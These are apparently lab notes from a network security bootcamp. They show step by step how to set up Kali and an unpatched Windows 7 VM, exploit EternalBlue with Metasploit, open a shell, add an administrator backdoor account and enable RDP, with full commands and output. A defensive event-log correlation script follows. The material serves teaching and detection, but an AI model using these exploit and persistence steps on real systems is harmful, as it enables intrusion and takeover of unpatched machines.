2023.5.15 Oldboy Network Security Bootcamp, Lesson 1

Please use the contents of this article properly and do not perform any illegal operations; the author accepts no responsibility for violations.

I. Prerequisites

  • Positioning and current state of network security

  • Gateway: the key node in a network that connects different networks and transfers data between them. It performs routing and forwarding and links the different networks together.

II. Configuring the Kali virtual machine

  1. Download the Kali virtual machine (the prebuilt compressed image was used directly)
  2. Configure the network connection mode
    1. Bridged: network connectivity test succeeded
    2. NAT: test failed
  3. Log in to the Kali VM: username and password are both kali
  4. Open a terminal and check the IP address
  5. Switch to the root environment: sudo su -
  6. Start the remote access service: /etc/init.d/ssh start
  7. Make the SSH service start at boot: update-rc.d ssh enable
  8. Connect to Kali remotely with Xshell

III. Building the Windows 7 Ultimate virtual machine

  1. Create the VM with the "Typical" option; no manual configuration is needed
  2. Install directly from the installation disc image; do not choose "install later", because that would update Windows 7 and patch the target vulnerability.
  3. After the Windows 7 installation completes, turn off the firewall.
  4. Check the IP address

IV. Attacking the target machine

  1. Attack principle: use a ready-made program in Kali to exploit a known vulnerability.
  2. Vulnerability name: Windows 7 EternalBlue
  3. Detailed steps
    1. Switch Kali to the root account: sudo su -
      ┌──(kali㉿kali)-[~]
      └─$ sudo su -
      [sudo] password for kali: 
      ┏━(Message from Kali developers)
      ┃
      ┃ We have kept /usr/bin/python pointing to Python 2 for backwards
      ┃ compatibility. Learn how to change this and avoid this message:
      ┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
      ┃
      ┗━(Run “touch ~/.hushlogin” to hide this message)
      ┌──(root💀kali)-[~]
      └─# 
      
    2. Check that the target machine responds to ping
    3. Scan ports 139 and 445 (SMB/NetBIOS ports): nmap -p 139,445 -Pn <target IP>
      ┌──(root💀kali)-[~]
      └─# nmap -p 139,445 -Pn 172.20.10.8
      139/tcp open  netbios-ssn
      445/tcp open  microsoft-ds
      (The main thing to check is that these two ports are reported as open.)
      
    4. Enter Kali's attack environment: msfconsole
      ┌──(root💀kali)-[~]
      └─# msfconsole
      
    5. Search for the EternalBlue exploit module: search ms17-010
      msf6 > search ms17-010
      
      Matching Modules
      ================
      
         #  Name                                           Disclosure Date  Rank     Check  Description
         -  ----                                           ---------------  ----     -----  -----------
         0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
         1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
         2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
         3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
         4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
         5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
      
      
      Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
      
    6. Check the module's applicable targets; using the index number is recommended (module 2 is used here): info 2
      msf6 > info 2
      
             Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
           Module: exploit/windows/smb/ms17_010_eternalblue
         Platform: Windows
             Arch: 
       Privileged: Yes
          License: Metasploit Framework License (BSD)
             Rank: Average
        Disclosed: 2017-03-14
      
      Provided by:
        Sean Dillon <sean.dillon@risksense.com>
        Dylan Davis <dylan.davis@risksense.com>
        Equation Group
        Shadow Brokers
        thelightcosine
      
      Available targets:
        Id  Name
        --  ----
        0   Windows 7 and Server 2008 R2 (x64) All Service Packs
      
      Check supported:
        Yes
      
      Basic options:
        Name           Current Setting  Required  Description
        ----           ---------------  --------  -----------
        RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
        RPORT          445              yes       The target port (TCP)
        SMBDomain      .                no        (Optional) The Windows domain to use for authentication
        SMBPass                         no        (Optional) The password for the specified username
        SMBUser                         no        (Optional) The username to authenticate as
        VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
        VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
      
      Payload information:
        Space: 2000
      
      Description:
        This module is a port of the Equation Group ETERNALBLUE exploit, 
        part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
        buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
        calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
        where a DWORD is subtracted into a WORD. The kernel pool is groomed 
        so that overflow is well laid-out to overwrite an SMBv1 buffer. 
        Actual RIP hijack is later completed in 
        srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
        not trigger 100% of the time, and should be run continuously until 
        triggered. It seems like the pool will get hot streaks and need a 
        cool down period before the shells rain in again. The module will 
        attempt to use Anonymous login, by default, to authenticate to 
        perform the exploit. If the user supplies credentials in the 
        SMBUser, SMBPass, and SMBDomain options it will use those instead. 
        On some systems, this module may cause system instability and 
        crashes, such as a BSOD or a reboot. This may be more likely with 
        some payloads.
      
      References:
        https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
        https://cvedetails.com/cve/CVE-2017-0143/
        https://cvedetails.com/cve/CVE-2017-0144/
        https://cvedetails.com/cve/CVE-2017-0145/
        https://cvedetails.com/cve/CVE-2017-0146/
        https://cvedetails.com/cve/CVE-2017-0147/
        https://cvedetails.com/cve/CVE-2017-0148/
        https://github.com/RiskSense-Ops/MS17-010
      
      Also known as:
        ETERNALBLUE
      
      
    7. Select the exploit module: use 2
      msf6 > use 2
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      
    8. Set the target machine's IP: set rhosts <target IP>
      msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.20.10.8
      rhosts => 172.20.10.8
      
    9. Run the exploit: run (the WIN banner means it succeeded)
      msf6 exploit(windows/smb/ms17_010_eternalblue) > run
      [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      [+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
    10. Drop into the target's DOS (cmd) shell: shell
      meterpreter > shell
      Process 2104 created.
      Channel 1 created.
      Microsoft Windows [版本 6.1.7600]
      版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
      
      C:\Windows\system32>
      
    11. Create a user
      C:\Windows\system32>net user oldgirl 123 /add
      net user oldgirl 123 /add
      命令成功完成。
      
    12. Add the user to the administrators group
      C:\Windows\system32>nat localgroup administrators oldgirl /add
      nat localgroup administrators oldgirl /add
      'nat' 不是内部或外部命令，也不是可运行的程序
      或批处理文件。
      (The command was mistyped as nat instead of net, so cmd reports that it is not a recognised command; the intended command is net localgroup administrators oldgirl /add.)
      
    13. Exit the target's shell
      C:\Windows\system32>exit
      exit
      meterpreter > 
      
    14. Remotely enable the target's desktop (RDP)
      meterpreter > run post/windows/manage/enable_rdp
      
      [*] Enabling Remote Desktop
      [*] 	RDP is disabled; enabling it ...
      [*] Setting Terminal Services service startup mode
      [*] 	The Terminal Services service is not set to auto, changing it to auto ...
      [*] 	Opening port in local firewall if necessary
      [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230519030303_default_172.20.10.8_host.windows.cle_231609.txt
      meterpreter > 
      
    15. After this, Remote Desktop Connection can be used to connect to the target machine.
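From the defender's side, the lab above leaves three artefacts in the target's event logs: a new local account (Security Event 4720), its addition to Administrators (4732) and the Remote Desktop Services start type changed by enable_rdp (System Event 7040, or Security 4657 on the fDenyTSConnections registry value when object auditing is on). The Python below, an added example that is not part of the original lesson, correlates those records per host within a short window; the log records are constructed sample data with simplified fields.

```python
"""Correlate the post-exploitation chain from this lab: local user
created (4720) -> added to Administrators (4732) -> RDP enabled
(System 7040 on TermService, or Security 4657 on fDenyTSConnections).
All records below are CONSTRUCTED sample data, not captured from a host."""
from datetime import datetime, timedelta

SAMPLE_EVENTS = [  # constructed; a real 4732 record carries the member SID
    {"time": "2023-05-19T03:02:05", "host": "WIN7-LAB", "id": 4720,
     "target": "oldgirl"},                             # user account created
    {"time": "2023-05-19T03:02:40", "host": "WIN7-LAB", "id": 4732,
     "target": "oldgirl", "group": "Administrators"},  # added to local group
    {"time": "2023-05-19T03:03:03", "host": "WIN7-LAB", "id": 7040,
     "service": "TermService", "to": "auto start"},    # RDP service start type
    {"time": "2023-05-19T09:15:00", "host": "FILESRV", "id": 4720,
     "target": "svc_backup"},                          # benign: nothing follows
]


def _t(ev):
    return datetime.fromisoformat(ev["time"])


def _rdp_enabled(ev):
    """True for either signal that Remote Desktop was switched on."""
    if ev["id"] == 7040 and ev.get("service") == "TermService":
        return True
    return (ev["id"] == 4657 and ev.get("value") == "fDenyTSConnections"
            and ev.get("new") == "0")


def correlate(events, window=timedelta(minutes=10)):
    """One alert per host/user where 4720, a 4732 into Administrators for
    that user, and an RDP-enable signal all fall within `window`."""
    alerts, by_host = [], {}
    for ev in events:
        by_host.setdefault(ev["host"], []).append(ev)
    for host, evs in by_host.items():
        evs.sort(key=_t)
        for ev in evs:
            if ev["id"] != 4720:
                continue
            user, t0 = ev["target"], _t(ev)
            later = [e for e in evs if t0 <= _t(e) <= t0 + window]
            admin = any(e["id"] == 4732 and e.get("target") == user
                        and e.get("group") == "Administrators" for e in later)
            if admin and any(_rdp_enabled(e) for e in later):
                alerts.append({"host": host, "user": user,
                               "first_seen": ev["time"]})
    return alerts
```

Run against real data, feed it records exported from the Security and System logs (for example with wevtutil or a SIEM query) mapped to the same fields; a lone 4720 such as the FILESRV record produces no alert, which keeps routine account provisioning quiet.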

V. Problems encountered

  • Could not connect to the network in NAT mode
    • First attempt
      • Change: in the VM's Virtual Network Editor, changed the gateway from 10.0.0.254 to 10.0.0.1 to match the gateway shown in the host's terminal.
      • Result: failed
    • Second attempt
      • Change: allowed the firewall to accept ICMP requests from the virtual machine
      • Result: failed
    • Third attempt
      • Change: deleted the VM and reinstalled it while re-watching the lesson, and used bridged mode instead of NAT
      • Result: success
      • Cause: after re-watching the video, I found that the remote access service had not been started in the Kali VM. I still have not found out why NAT mode does not work.
  • Several reasons for failing to connect to the network
    • In bridged mode
      • The host's firewall blocks the VM's requests
      • The IP address and gateway do not match the host's
      • The VMware virtual gateway has a problem
      • The remote access service was not started on the VM side